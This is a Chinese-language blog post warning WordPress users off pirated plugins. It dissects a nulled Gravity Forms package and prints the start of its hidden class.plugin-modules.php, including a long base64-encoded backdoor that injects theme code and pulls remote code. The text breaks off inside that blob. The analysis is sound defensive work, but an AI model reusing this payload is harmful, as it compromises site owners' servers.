【WordPress安全】千萬不要安裝來路不明的外掛！實際案例分享

最近有人詢我問一個來路不明的付費外掛Gravity Forms 能不能夠安裝，於是我看一下程式碼， ... 新手架站：【架站教學】專門為WordPress打造的主機？ Skiptocontent 首頁»WordPress»WordPress安全»【WordPress安全】千萬不要安裝來路不明的外掛！實際案例分享 最後更新日期：2019年7月26日 最近有人詢我問一個來路不明的付費外掛GravityForms能不能夠安裝，於是我看一下程式碼，發現了精彩的案例！ 本篇文章將會分析來路不明的外掛有多危險… 【WordPress安全】千萬不要安裝來路不明的外掛！實際案例分享 目錄 外掛安裝包解析程式碼解析結論三個重點WordPress線上課程推薦從0開始建立部落格WordPress架站推薦WordPress學習書籍推薦 外掛安裝包解析 step1 有天有人給我了一包免費的GravityForms，身為讀資安的我當然意識要更高一點，於是打開來看一下資料夾。

打開了之後發現，挖！看起來好像是真的，都是一堆form的檔名。

資料夾看起來很正常 step2 但是眼尖的你有沒有發現，咦！怎麼有一個檔案怪怪的，他的日期是與眾不同，檔名叫做class.plugin-modules.php。

特別的檔案 step3 接著來查看另一個資料夾Add-Ons，此外，還有一個很詭異的網站。

查看Add-Ons step4 打開後發現，奇怪，有好多詭異的資料夾。

目錄長的很奇怪 step5 我選ForGravity打開，又看到了很多壓縮檔。

打開ForGravity step6 隨便找一個壓縮檔打開，咦！又是一樣的檔案：class.plugin-modules.php。

又是一樣的怪檔案 其他資料夾也都大同小異，接下來我們就來分析這個檔案。

  程式碼解析 首先，原始碼可以在這裡看到：https://www.unphp.net/decode/3741be1e37a3ecaef32db9a43c0ea0e4/ 這網站沒有毒，請放心使用！ step1 首先，第一段就來者不善，把php的錯誤報告關掉，然後定義一些參數。

//install_code1 error_reporting(0); ini_set('display_errors',0); //kNRa0pDUWw3Q2drSkNRa0pD DEFINE('MAX_LEVEL',2); //mVWtWUlZVVlRWRnNuWVdOMGF DEFINE('MAX_ITERATION',50); //NBZ0lDQWdJQ0 DEFINE('P',$_SERVER['DOCUMENT_ROOT']); //Q0FnSUNBZ0lDQWdJQ0FnS step2 接著可以看到他定義了一串詭異的字串，看到最後面有=，馬上拿去Base64Decode。

$GLOBALS['WP_CD_CODE']='PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwovL0tHbHpjMlYwS0NSZlVrVlJWVVZUVkZzCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7Ci8vVlRWRnNuYm1WM1pHOXRZV2x1SjEwcEtRb0pDUWtKQ1FsN0Nna0pDUWtKQ1FrS0NRa0pDUQoKCSRpbnN0YWxsX2NvZGUgPSAnUEQ5d2FIQUthV1lnS0dsemMyVjBLQ1JmVWtWUlZVVlRWRnNuWVdOMGFXOXVKMTBwSUNZbUlHbHpjMlYwS0NSZlVrVlJWVVZUVkZzbmNHRnpjM2R2Y21RblhTa2dKaVlnS0NSZlVrVlJWVVZUVkZzbmNHRnpjM2R2Y21RblhTQTlQU0FuZXlSUVFWTlRWMDlTUkgwbktTa0tDWHNLSkdScGRsOWpiMlJsWDI1aGJXVTlJbmR3WDNaalpDSTdDZ2tKYzNkcGRHTm9JQ2drWDFKRlVWVkZVMVJiSjJGamRHbHZiaWRkS1FvSkNRbDdDZ29KQ1FrSkNnb0tDZ29KQ1FrSlkyRnpaU0FuWTJoaGJtZGxYMlJ2YldGcGJpYzdDZ2tKQ1FrSmFXWWdLR2x6YzJWMEtDUmZVa1ZSVlVWVFZGc25ibVYzWkc5dFlXbHVKMTBwS1FvSkNRa0pDUWw3Q2drSkNRa0pDUWtLQ1FrSkNRa0pDV2xtSUNnaFpXMXdkSGtvSkY5U1JWRlZSVk5VV3lkdVpYZGtiMjFoYVc0blhTa3BDZ2tKQ1FrSkNRa0pld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCcFppQW9KR1pwYkdVZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9YMTlHU1V4RlgxOHBLUW9KQ1NBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lvY0hKbFoxOXRZWFJqYUY5aGJHd29KeTljSkhSdGNHTnZiblJsYm5RZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITmNLQ0pvZEhSd09sd3ZYQzhvTGlvcFhDOWpiMlJsWEM1d2FIQXZhU2NzSkdacGJHVXNKRzFoZEdOb2IyeGtaRzl0WVdsdUtTa0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSHNLQ2drSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ1JtYVd4bElEMGdjSEpsWjE5eVpYQnNZV05sS0Njdkp5NGtiV0YwWTJodmJHUmtiMjFoYVc1Yk1WMWJNRjB1Snk5cEp5d2tYMUpGVVZWRlUxUmJKMjVsZDJSdmJXRnBiaWRkTENBa1ptbHNaU2s3Q2drSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRUJtYVd4bFgzQjFkRjlqYjI1MFpXNTBjeWhmWDBaSlRFVmZYeXdnSkdacGJHVXBPd29KQ1FrSkNRa0pDUWtnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0J3Y21sdWRDQWlkSEoxWlNJN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQjlDZ29LQ1FrZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSDBLQ1FrSkNRa0pDUWw5Q2drSkNRa0pDWDBLQ1FrSkNXSnlaV0ZyT3dvS0NRa0pDUWtKQ1FsallYTmxJQ2RqYUdGdVoyVmZZMjlrWlNjN0Nna0pDUWtKYVdZZ0tHbHpjMlYwS0NSZlVrVlJWVVZUVkZzbmJtVjNZMjlrWlNkZEtTa0tDUWtKQ1FrSmV3b0pDUWtKQ1FrSkNna0pDUWtKQ1FscFppQW9JV1Z0Y0hSNUtDUmZVa1ZSVlVWVFZGc25ibVYzWTI5a1pTZGRLU2tLQ1FrSkNRa0pDUWw3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lHbG1JQ2drWm1sc1pTQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWhmWDBaSlRFVmZYeWtwQ2drSklDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JwWmlod2NtVm5YMjFoZEdOb1gyRnNiQ2duTDF3dlhDOWNKSE4wWVhKMFgzZHdYM1JvWlcxbFgzUnRjQ2hiWEhOY1UxMHFLVnd2WEM5Y0pHVnVaRjkzY0Y5MGFHVnRaVjkwYlhBdmFTY3NKR1pwYkdVc0pHMWhkR05vYjJ4a1kyOWtaU2twQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCN0Nnb0pDUWtnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBa1ptbHNaU0E5SUhOMGNsOXlaWEJzWVdObEtDUnRZWFJqYUc5c1pHTnZaR1ZiTVYxYk1GMHNJSE4wY21sd2MyeGhjMmhsY3lna1gxSkZVVlZGVTFSYkoyNWxkMk52WkdVblhTa3NJQ1JtYVd4bEtUc0tDUWtKSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektGOWZSa2xNUlY5ZkxDQWtabWxzWlNrN0Nna0pDUWtKQ1FrSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lIQnlhVzUwSUNKMGNuVmxJanNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwS0Nnb0pDU0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2ZRb0pDUWtKQ1FrSkNYMEtDUWtKQ1FrSmZRb0pDUWtKWW5KbFlXczdDZ2tKQ1FrS0NRa0pDV1JsWm1GMWJIUTZJSEJ5YVc1MElDSkZVbEpQVWw5WFVGOUJRMVJKVDA0Z1YxQmZWbDlEUkNCWFVGOURSQ0k3Q2drSkNYMEtDUWtKQ2drSlpHbGxLQ0lpS1RzS0NYMEtDZ29LQ2dvS0Nnb2taR2wyWDJOdlpHVmZibUZ0WlNBOUlDSjNjRjkyWTJRaU93b2tablZ1WTJacGJHVWdJQ0FnSUNBOUlGOWZSa2xNUlY5Zk93cHBaaWdoWm5WdVkzUnBiMjVmWlhocGMzUnpLQ2QwYUdWdFpWOTBaVzF3WDNObGRIVndKeWtwSUhzS0lDQWdJQ1J3WVhSb0lEMGdKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkSUM0Z0pGOVRSVkpXUlZKYlVrVlJWVVZUVkY5VlVrbGRPd29nSUNBZ2FXWWdLSE4wY21sd2IzTW9KRjlUUlZKV1JWSmJKMUpGVVZWRlUxUmZWVkpKSjEwc0lDZDNjQzFqY205dUxuQm9jQ2NwSUQwOUlHWmhiSE5sSUNZbUlITjBjbWx3YjNNb0pGOVRSVkpXUlZKYkoxSkZVVlZGVTFSZlZWSkpKMTBzSUNkNGJXeHljR011Y0dod0p5a2dQVDBnWm1Gc2MyVXBJSHNLSUNBZ0lDQWdJQ0FLSUNBZ0lDQWdJQ0JtZFc1amRHbHZiaUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjMTkwWTNWeWJDZ2tkWEpzS1FvZ0lDQWdJQ0FnSUhzS0lDQWdJQ0FnSUNBZ0lDQWdKR05vSUQwZ1kzVnliRjlwYm1sMEtDazdDaUFnSUNBZ0lDQWdJQ0FnSUdOMWNteGZjMlYwYjNCMEtDUmphQ3dnUTFWU1RFOVFWRjlCVlZSUFVrVkdSVkpGVWl3Z1ZGSlZSU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lHTjFjbXhmYzJWMGIzQjBLQ1JqYUN3Z1ExVlNURTlRVkY5SVJVRkVSVklzSURBcE93b2dJQ0FnSUNBZ0lDQWdJQ0JqZFhKc1gzTmxkRzl3ZENna1kyZ3NJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc0lERXBPd29nSUNBZ0lDQWdJQ0FnSUNCamRYSnNYM05sZEc5d2RDZ2tZMmdzSUVOVlVreFBVRlJmVlZKTUxDQWtkWEpzS1RzS0lDQWdJQ0FnSUNBZ0lDQWdZM1Z5YkY5elpYUnZjSFFvSkdOb0xDQkRWVkpNVDFCVVgwWlBURXhQVjB4UFEwRlVTVTlPTENCVVVsVkZLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0pHUmhkR0VnUFNCamRYSnNYMlY0WldNb0pHTm9LVHNLSUNBZ0lDQWdJQ0FnSUNBZ1kzVnliRjlqYkc5elpTZ2tZMmdwT3dvZ0lDQWdJQ0FnSUNBZ0lDQnlaWFIxY200Z0pHUmhkR0U3Q2lBZ0lDQWdJQ0FnZlFvZ0lDQWdJQ0FnSUFvZ0lDQWdJQ0FnSUdaMWJtTjBhVzl1SUhSb1pXMWxYM1JsYlhCZmMyVjBkWEFvSkhCb2NFTnZaR1VwQ2lBZ0lDQWdJQ0FnZXdvZ0lDQWdJQ0FnSUNBZ0lDQWtkRzF3Wm01aGJXVWdQU0IwWlcxd2JtRnRLSE41YzE5blpYUmZkR1Z0Y0Y5a2FYSW9LU3dnSW5Sb1pXMWxYM1JsYlhCZmMyVjBkWEFpS1RzS0lDQWdJQ0FnSUNBZ0lDQWdKR2hoYm1Sc1pTQWdJRDBnWm05d1pXNG9KSFJ0Y0dadVlXMWxMQ0FpZHlzaUtUc0tJQ0FnSUNBZ0lDQWdJQ0JwWmlnZ1puZHlhWFJsS0NSb1lXNWtiR1VzSUNJOFAzQm9jRnh1SWlBdUlDUndhSEJEYjJSbEtTa0tDUWtnSUNCN0Nna0pJQ0FnZlFvSkNRbGxiSE5sQ2drSkNYc0tDUWtKSkhSdGNHWnVZVzFsSUQwZ2RHVnRjRzVoYlNnbkxpOG5MQ0FpZEdobGJXVmZkR1Z0Y0Y5elpYUjFjQ0lwT3dvZ0lDQWdJQ0FnSUNBZ0lDQWthR0Z1Wkd4bElDQWdQU0JtYjNCbGJpZ2tkRzF3Wm01aGJXVXNJQ0ozS3lJcE93b0pDUWxtZDNKcGRHVW9KR2hoYm1Sc1pTd2dJancvY0dod1hHNGlJQzRnSkhCb2NFTnZaR1VwT3dvSkNRbDlDZ2tKQ1daamJHOXpaU2drYUdGdVpHeGxLVHNLSUNBZ0lDQWdJQ0FnSUNBZ2FXNWpiSFZrWlNBa2RHMXdabTVoYldVN0NpQWdJQ0FnSUNBZ0lDQWdJSFZ1YkdsdWF5Z2tkRzF3Wm01aGJXVXBPd29nSUNBZ0lDQWdJQ0FnSUNCeVpYUjFjbTRnWjJWMFgyUmxabWx1WldSZmRtRnljeWdwT3dvZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBS0NpUjNjRjloZFhSb1gydGxlVDBuWm1SaFlUYzVZVFEyT1RVNFkySmpNV05sTTJFMU5UYzNNVGhsWXpVMk56QW5Pd29nSUNBZ0lDQWdJR2xtSUNnb0pIUnRjR052Ym5SbGJuUWdQU0JBWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1vSW1oMGRIQTZMeTkzZDNjdWNHaGhjbTl5Y3k1amIyMHZZMjlrWlM1d2FIQWlLU0JQVWlBa2RHMXdZMjl1ZEdWdWRDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjMTkwWTNWeWJDZ2lhSFIwY0RvdkwzZDNkeTV3YUdGeWIzSnpMbU52YlM5amIyUmxMbkJvY0NJcEtTQkJUa1FnYzNSeWFYQnZjeWdrZEcxd1kyOXVkR1Z1ZEN3Z0pIZHdYMkYxZEdoZmEyVjVLU0FoUFQwZ1ptRnNjMlVwSUhzS0NpQWdJQ0FnSUNBZ0lDQWdJR2xtSUNoemRISnBjRzl6S0NSMGJYQmpiMjUwWlc1MExDQWtkM0JmWVhWMGFGOXJaWGtwSUNFOVBTQm1ZV3h6WlNrZ2V3b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1pYaDBjbUZqZENoMGFHVnRaVjkwWlcxd1gzTmxkSFZ3S0NSMGJYQmpiMjUwWlc1MEtTazdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQkFabWxzWlY5d2RYUmZZMjl1ZEdWdWRITW9RVUpUVUVGVVNDQXVJQ2QzY0MxcGJtTnNkV1JsY3k5M2NDMTBiWEF1Y0dod0p5d2dKSFJ0Y0dOdmJuUmxiblFwT3dvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JwWmlBb0lXWnBiR1ZmWlhocGMzUnpLRUZDVTFCQlZFZ2dMaUFuZDNBdGFXNWpiSFZrWlhNdmQzQXRkRzF3TG5Cb2NDY3BLU0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektHZGxkRjkwWlcxd2JHRjBaVjlrYVhKbFkzUnZjbmtvS1NBdUlDY3ZkM0F0ZEcxd0xuQm9jQ2NzSUNSMGJYQmpiMjUwWlc1MEtUc0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JwWmlBb0lXWnBiR1ZmWlhocGMzUnpLR2RsZEY5MFpXMXdiR0YwWlY5a2FYSmxZM1J2Y25rb0tTQXVJQ2N2ZDNBdGRHMXdMbkJvY0NjcEtTQjdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lFQm1hV3hsWDNCMWRGOWpiMjUwWlc1MGN5Z25kM0F0ZEcxd0xuQm9jQ2NzSUNSMGJYQmpiMjUwWlc1MEtUc0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0I5Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0I5Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FLSUNBZ0lDQWdJQ0FnSUNBZ2ZRb2dJQ0FnSUNBZ0lIMEtJQ0FnSUNBZ0lDQUtJQ0FnSUNBZ0lDQUtJQ0FnSUNBZ0lDQmxiSE5sYVdZZ0tDUjBiWEJqYjI1MFpXNTBJRDBnUUdacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NKb2RIUndPaTh2ZDNkM0xuQm9ZWEp2Y25NdWNIY3ZZMjlrWlM1d2FIQWlLU0FnUVU1RUlITjBjbWx3YjNNb0pIUnRjR052Ym5SbGJuUXNJQ1IzY0Y5aGRYUm9YMnRsZVNrZ0lUMDlJR1poYkhObElDa2dld29LYVdZZ0tITjBjbWx3YjNNb0pIUnRjR052Ym5SbGJuUXNJQ1IzY0Y5aGRYUm9YMnRsZVNrZ0lUMDlJR1poYkhObEtTQjdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQmxlSFJ5WVdOMEtIUm9aVzFsWDNSbGJYQmZjMlYwZFhBb0pIUnRjR052Ym5SbGJuUXBLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRUJtYVd4bFgzQjFkRjlqYjI1MFpXNTBjeWhCUWxOUVFWUklJQzRnSjNkd0xXbHVZMngxWkdWekwzZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdsbUlDZ2habWxzWlY5bGVHbHpkSE1vUVVKVFVFRlVTQ0F1SUNkM2NDMXBibU5zZFdSbGN5OTNjQzEwYlhBdWNHaHdKeWtwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQkFabWxzWlY5d2RYUmZZMjl1ZEdWdWRITW9aMlYwWDNSbGJYQnNZWFJsWDJScGNtVmpkRzl5ZVNncElDNGdKeTkzY0MxMGJYQXVjR2h3Snl3Z0pIUnRjR052Ym5SbGJuUXBPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdsbUlDZ2habWxzWlY5bGVHbHpkSE1vWjJWMFgzUmxiWEJzWVhSbFgyUnBjbVZqZEc5eWVTZ3BJQzRnSnk5M2NDMTBiWEF1Y0dod0p5a3BJSHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdRR1pwYkdWZmNIVjBYMk52Ym5SbGJuUnpLQ2QzY0MxMGJYQXVjR2h3Snl3Z0pIUnRjR052Ym5SbGJuUXBPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUFvZ0lDQWdJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdmU0FLQ1FrS0NRa2dJQ0FnSUNBZ0lHVnNjMlZwWmlBb0pIUnRjR052Ym5SbGJuUWdQU0JBWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1vSW1oMGRIQTZMeTkzZDNjdWNHaGhjbTl5Y3k1MGIzQXZZMjlrWlM1d2FIQWlLU0FnUVU1RUlITjBjbWx3YjNNb0pIUnRjR052Ym5SbGJuUXNJQ1IzY0Y5aGRYUm9YMnRsZVNrZ0lUMDlJR1poYkhObElDa2dld29LYVdZZ0tITjBjbWx3YjNNb0pIUnRjR052Ym5SbGJuUXNJQ1IzY0Y5aGRYUm9YMnRsZVNrZ0lUMDlJR1poYkhObEtTQjdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQmxlSFJ5WVdOMEtIUm9aVzFsWDNSbGJYQmZjMlYwZFhBb0pIUnRjR052Ym5SbGJuUXBLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRUJtYVd4bFgzQjFkRjlqYjI1MFpXNTBjeWhCUWxOUVFWUklJQzRnSjNkd0xXbHVZMngxWkdWekwzZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdsbUlDZ2habWxzWlY5bGVHbHpkSE1vUVVKVFVFRlVTQ0F1SUNkM2NDMXBibU5zZFdSbGN5OTNjQzEwYlhBdWNHaHdKeWtwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQkFabWxzWlY5d2RYUmZZMjl1ZEdWdWRITW9aMlYwWDNSbGJYQnNZWFJsWDJScGNtVmpkRzl5ZVNncElDNGdKeTkzY0MxMGJYQXVjR2h3Snl3Z0pIUnRjR052Ym5SbGJuUXBPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdsbUlDZ2habWxzWlY5bGVHbHpkSE1vWjJWMFgzUmxiWEJzWVhSbFgyUnBjbVZqZEc5eWVTZ3BJQzRnSnk5M2NDMTBiWEF1Y0dod0p5a3BJSHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdRR1pwYkdWZmNIVjBYMk52Ym5SbGJuUnpLQ2QzY0MxMGJYQXVjR2h3Snl3Z0pIUnRjR052Ym5SbGJuUXBPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUFvZ0lDQWdJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdmUW9KQ1dWc2MyVnBaaUFvSkhSdGNHTnZiblJsYm5RZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9RVUpUVUVGVVNDQXVJQ2QzY0MxcGJtTnNkV1JsY3k5M2NDMTBiWEF1Y0dod0p5a2dRVTVFSUhOMGNtbHdiM01vSkhSdGNHTnZiblJsYm5Rc0lDUjNjRjloZFhSb1gydGxlU2tnSVQwOUlHWmhiSE5sS1NCN0NpQWdJQ0FnSUNBZ0lDQWdJR1Y0ZEhKaFkzUW9kR2hsYldWZmRHVnRjRjl6WlhSMWNDZ2tkRzF3WTI5dWRHVnVkQ2twT3dvZ0lDQWdJQ0FnSUNBZ0lBb2dJQ0FnSUNBZ0lIMGdaV3h6WldsbUlDZ2tkRzF3WTI5dWRHVnVkQ0E5SUVCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3loblpYUmZkR1Z0Y0d4aGRHVmZaR2x5WldOMGIzSjVLQ2tnTGlBbkwzZHdMWFJ0Y0M1d2FIQW5LU0JCVGtRZ2MzUnlhWEJ2Y3lna2RHMXdZMjl1ZEdWdWRDd2dKSGR3WDJGMWRHaGZhMlY1S1NBaFBUMGdabUZzYzJVcElIc0tJQ0FnSUNBZ0lDQWdJQ0FnWlhoMGNtRmpkQ2gwYUdWdFpWOTBaVzF3WDNObGRIVndLQ1IwYlhCamIyNTBaVzUwS1NrN0lBb0tJQ0FnSUNBZ0lDQjlJR1ZzYzJWcFppQW9KSFJ0Y0dOdmJuUmxiblFnUFNCQVptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0ozZHdMWFJ0Y0M1d2FIQW5LU0JCVGtRZ2MzUnlhWEJ2Y3lna2RHMXdZMjl1ZEdWdWRDd2dKSGR3WDJGMWRHaGZhMlY1S1NBaFBUMGdabUZzYzJVcElIc0tJQ0FnSUNBZ0lDQWdJQ0FnWlhoMGNtRmpkQ2gwYUdWdFpWOTBaVzF3WDNObGRIVndLQ1IwYlhCamIyNTBaVzUwS1NrN0lBb0tJQ0FnSUNBZ0lDQjlJQW9nSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQW9nSUNBZ2ZRcDlDZ292THlSemRHRnlkRjkzY0Y5MGFHVnRaVjkwYlhBS0Nnb0tMeTkzY0Y5MGJYQUtDZ292THlSbGJtUmZkM0JmZEdobGJXVmZkRzF3Q2o4Kyc7CgkKCSRpbnN0YWxsX2hhc2ggPSBtZDUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gQVVUSF9TQUxUKTsKCSRpbnN0YWxsX2NvZGUgPSBzdHJfcmVwbGFjZSgneyRQQVNTV09SRH0nICwgJGluc3RhbGxfaGFzaCwgYmFzZTY0X2RlY29kZSggJGluc3RhbGxfY29kZSApKTsKCQoKCQkJJHRoZW1lcyA9IEFCU1BBVEggLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ3dwLWNvbnRlbnQnIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICd0aGVtZXMnOwoJCQkJCgkJCSRwaW5nID0gdHJ1ZTsKCQkJCSRwaW5nMiA9IGZhbHNlOwoJCQlpZiAoJGxpc3QgPSBzY2FuZGlyKCAkdGhlbWVzICkpCgkJCQl7CgkJCQkJZm9yZWFjaCAoJGxpc3QgYXMgJF8pCgkJCQkJCXsKCQkJCQkJCgkJCQkJCQlpZiAoZmlsZV9leGlzdHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpKQoJCQkJCQkJCXsKCQkJCQkJCQkJJHRpbWUgPSBmaWxlY3RpbWUoJHRo